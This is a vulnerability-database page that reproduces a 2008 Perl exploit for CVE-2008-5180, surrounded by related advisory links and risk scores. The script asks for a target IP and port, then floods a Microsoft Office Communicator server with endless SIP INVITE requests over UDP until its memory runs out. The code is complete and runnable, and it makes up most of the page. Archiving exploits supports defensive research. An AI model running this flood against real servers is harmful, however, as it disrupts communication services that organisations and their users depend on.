Vulners
Lucene search
Microsoft Office - Communicator 'SIP' Remote Denial of Service
| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
 | Microsoft Office Communicator (SIP) Remote Denial of Service Exploit | 28 Nov 200800:00 | – | zdt |
 | CVE-2008-5180 | 28 Nov 200800:00 | – | circl |
 | CVE-2008-5180 | 20 Nov 200815:00 | – | cve |
 | CVE-2008-5180 | 20 Nov 200815:00 | – | cvelist |
 | Microsoft Office - Communicator SIP Remote Denial of Service | 28 Nov 200800:00 | – | exploitpack |
 | CVE-2008-5180 | 20 Nov 200815:30 | – | nvd |
 | msoffice-dos.txt | 29 Nov 200800:00 | – | packetstorm |
 | Code injection | 20 Nov 200815:30 | – | prion |
 | PT-2008-6324 · Microsoft · Ge Communicator +1 | 20 Nov 200800:00 | – | ptsecurity |
 | Microsoft Office Communicator (SIP) Remote Denial of Service Exploit | 29 Nov 200800:00 | – | seebug |
10
#!usr/bin/perl -w
################################################################################################################
# Microsoft Communicator allows remote attackers to cause a denial of service (memory consumption) via
# a large number of SIP INVITE requests, which trigger the creation of many sessions.
#
# Refer:
# http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5180
# http://xforce.iss.net/xforce/xfdb/46673
#
#
# To run this exploit on MS Windows replace "#!usr/bin/perl -w" with "#!Installation_path_for_perl -w"
# (say #!C:/Program Files/Perl/bin/perl -w)
#
# This was strictly written for educational purpose. Use it at your own risk.
# Author will not bare any responsibility for any damages watsoever.
#
# Author: Praveen Darshanam
# Email: praveen[underscore]recker[at]sify.com
# Date: 27th November, 2008
#
# NOTE: Thanks to all my colleagues at iPolicy Networks for making this possible.
# For reliable security solutions please visit http://www.ipolicynetworks.com/
#
##################################################################################################################
use IO::Socket;
print("\nEnter IP Address of Vulnerable MS Communicator Server: \n");
$vuln_host_ip = <STDIN>;
############################################################
#default port on which SIP works is UDP 5060
#go thru http://technet.microsoft.com/en-us/library/bb963969.aspx for default ports
###################
print("\nEnter UDP port for MS Communicator Server: \n");
$port = <STDIN>;
$sock_sip = IO::Socket::INET->new( PeerAddr => $vuln_host_ip,
PeerPort => $port,
Proto => 'udp') || "Unable to create Socket";
#if the server is configured on TCP replace 'udp' with 'tcp'.
while(1)
{
print $sock_sip "INVITE sip:arpman.malicious.com SIP/2.0\r\nVia: SIP/2.0/UDP 172.16.16.4;branch=123-4567-900\r\n";
#kill by pressing Ctrl+c to stop flood of packets
}
#program never comes here for execution
close($sock_sip);
# milw0rm.com [2008-11-28]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
28 Nov 2008 00:00Current
7High risk
Vulners AI Score7
CVSS 25
CVSS 3.15.3
EPSS0.76735
SSVC